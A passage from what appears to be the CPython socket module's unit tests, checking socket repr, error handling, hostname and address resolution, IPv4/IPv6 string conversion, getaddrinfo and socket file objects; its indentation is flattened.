"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
